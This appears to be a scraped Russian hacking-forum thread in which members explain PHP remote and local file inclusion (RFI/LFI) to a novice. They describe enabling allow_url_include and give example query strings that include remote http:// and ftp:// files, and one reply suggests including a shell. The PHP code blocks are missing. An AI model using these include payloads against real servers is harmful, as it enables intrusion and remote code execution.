![]() |
|
B1t.exe, при чем здесь инклуд?
|
Цитата:
|
B1t.exe
сделай на локалке что то подобное PHP код:
|
Цитата:
|
Цитата:
Для удаленного инклуда на срвере должен быть включен allow_url_include. В плюс к тому- очень мала вероятность того, что у тебя инклуд, тем более удаленный. P.S.: Почитай лутше вот эту статью: http://forum.antichat.ru/thread23501.html В ней задохлик очень хорошо описал процесс проверения пхп инжектов. Это пожалуй лутшая статья на античате на тему php injection, ИМХО. |
я не понимаю .. на локалке. т.е. ?
на свем компе ? зачем? я залил этот скрипт на сервер (интернет) и при запросе www.mysite.ru/ххх.php Цитата:
|
b1t.exe, иди учи php
|
Да и зачем инклудить то что в свою очередь тоже что-то инклудит?)) Если уж и есть уязвимость,то правильней было бы инклудить шелл,или какой-нить код,который надо выполнить,например копирование шелла,вотъ...
Цитата:
|
2B1t.exe, омг.
PHP код:
Есл хочешь попрактиковаться с RFI - лезь у себя в php.ini, ищи директиву allow_url_include и выставляй ее в положение ON, так как по дефолту она отрублена. Затем можешь заюзать такой скриптек: PHP код:
Код:
localhost/script.php?file=http://google.comPHP код:
Код:
localhost/script.php?file=ftp://login:pass@host/file.phpТак же если фильтруются ".", "/", юзай способ описаный товарисчем cr0w: https://forum.antichat.ru/thread106780.html По аналогии и с ЛФИ, нy кароче ты понял) |
Цитата:
B1t.exe, если ты действительно хочешь научиться LFI, RFI, да и вообще поиску уязвимостей, советую тебе сначала изучить пыху хотя бы поверхностно. |
| Время: 22:02 |
|